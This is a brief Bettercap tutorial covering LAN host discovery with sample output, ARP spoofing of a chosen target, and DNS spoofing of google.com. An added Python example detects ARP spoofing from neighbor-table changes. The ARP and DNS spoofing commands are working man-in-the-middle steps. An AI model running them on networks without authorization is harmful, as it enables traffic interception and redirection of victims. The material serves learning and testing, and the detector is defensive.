Getting Started with Bettercap

Installation

To begin using Bettercap, install it with your distribution's package manager (apt on a Debian-based system is assumed here), then start it as root:

sudo apt install bettercap
sudo bettercap

Network Probing

The net.probe command is essential for discovering devices on your network. When activated, it automatically starts net.recon and begins probing addresses on your network.

net.probe on

192.168.88.0/24 > 192.168.88.81  » net.probe on
192.168.88.0/24 > 192.168.88.81  » [21:26:59] [sys.log] [inf] net.probe starting net.recon as a requirement for net.probe
192.168.88.0/24 > 192.168.88.81  » [21:26:59] [sys.log] [inf] net.probe probing 256 addresses on 192.168.88.0/24
192.168.88.0/24 > 192.168.88.81  » [21:26:59] [endpoint.new] endpoint 192.168.88.1 detected as 76:ac:b9:1f:38:2a.
192.168.88.0/24 > 192.168.88.81  » [21:27:01] [endpoint.new] endpoint 192.168.88.138 detected as bc:24:11:8c:a4:60.
192.168.88.0/24 > 192.168.88.81  » [21:27:01] [endpoint.new] endpoint 192.168.88.171 detected as 6c:4b:90:58:0f:9a (LiteON).
192.168.88.0/24 > 192.168.88.81  » net.show

┌────────────────┬───────────────────┬─────────┬────────┬───────┬───────┬──────────┐
│      IP ▴      │        MAC        │  Name   │ Vendor │ Sent  │ Recvd │   Seen   │
├────────────────┼───────────────────┼─────────┼────────┼───────┼───────┼──────────┤
│ 192.168.88.81  │ bc:24:11:65:a7:75 │ ens18   │        │ 0 B   │ 0 B   │ 21:26:54 │
│                │                   │         │        │       │       │          │
│ 192.168.88.1   │ 76:ac:b9:1f:38:2a │         │        │ 699 B │ 384 B │ 21:27:04 │
│ 192.168.88.138 │ bc:24:11:8c:a4:60 │ debian. │        │ 120 B │ 92 B  │ 21:27:01 │
│ 192.168.88.171 │ 6c:4b:90:58:0f:9a │         │ LiteON │ 120 B │ 92 B  │ 21:27:01 │
└────────────────┴───────────────────┴─────────┴────────┴───────┴───────┴──────────┘

This will output information about discovered devices, including their IP addresses and MAC addresses.

Viewing Network Information

To see all discovered devices and their details, use the net.show command. This displays a comprehensive table with:

  • IP Addresses
  • MAC Addresses
  • Device Names
  • Vendors
  • Traffic Statistics
  • Last Seen Timestamps

ARP Spoofing

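To monitor traffic from a specific target, set it as the ARP spoofing target. Bettercap then poisons the target's ARP cache so that the target's traffic passes through your machine: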

set arp.spoof.targets 192.168.88.138
arp.spoof on
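
Seen from the target's side, ARP spoofing shows up in the neighbor table: the gateway's IP suddenly maps to a different MAC, and that MAC is shared with another host. The following detection check is an added example, not part of the original page or of Bettercap. The `ip neigh show` snapshots are constructed from the addresses in the net.show table above, and the function names are hypothetical.

```python
import re
from collections import defaultdict

# Constructed `ip neigh show` snapshots as seen on the target (192.168.88.138),
# reusing addresses from the net.show table; this is not captured output.
BEFORE = """\
192.168.88.1 dev ens18 lladdr 76:ac:b9:1f:38:2a REACHABLE
192.168.88.81 dev ens18 lladdr bc:24:11:65:a7:75 STALE
192.168.88.171 dev ens18 lladdr 6c:4b:90:58:0f:9a STALE
192.168.88.200 dev ens18 FAILED
"""
AFTER = """\
192.168.88.1 dev ens18 lladdr bc:24:11:65:a7:75 REACHABLE
192.168.88.81 dev ens18 lladdr bc:24:11:65:a7:75 REACHABLE
192.168.88.171 dev ens18 lladdr 6C:4B:90:58:0F:9A STALE
192.168.88.200 dev ens18 FAILED
"""

NEIGH = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}) dev \S+ lladdr ([0-9a-fA-F:]{17})\b")

def parse_neigh(text):
    """Return {ip: mac} for IPv4 entries that carry a link-layer address."""
    table = {}
    for line in text.splitlines():
        m = NEIGH.match(line.strip())
        if m:  # FAILED/INCOMPLETE entries have no lladdr and are skipped
            table[m.group(1)] = m.group(2).lower()  # normalise MAC case
    return table

def arp_anomalies(baseline, current):
    """Compare a trusted baseline table with the current one; list findings."""
    findings = []
    for ip, mac in sorted(current.items()):
        old = baseline.get(ip)
        if old and old != mac:  # known IP now answers with a different MAC
            findings.append(("mac-changed", ip, old, mac))
    owners = defaultdict(list)
    for ip, mac in current.items():
        owners[mac].append(ip)
    for mac, ips in sorted(owners.items()):
        if len(ips) > 1:  # one MAC claiming several IPs
            findings.append(("mac-shared", mac, tuple(sorted(ips))))
    return findings

if __name__ == "__main__":
    for finding in arp_anomalies(parse_neigh(BEFORE), parse_neigh(AFTER)):
        print(finding)
```

A shared MAC alone can be legitimate (a router with several addresses, for instance), so the strong signal is a change on the gateway entry combined with sharing.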

DNS Spoofing

To redirect traffic for specific domains to your machine:

set dns.spoof.domains google.com
dns.spoof on

Remember to use these tools responsibly and only on networks you own or have permission to test.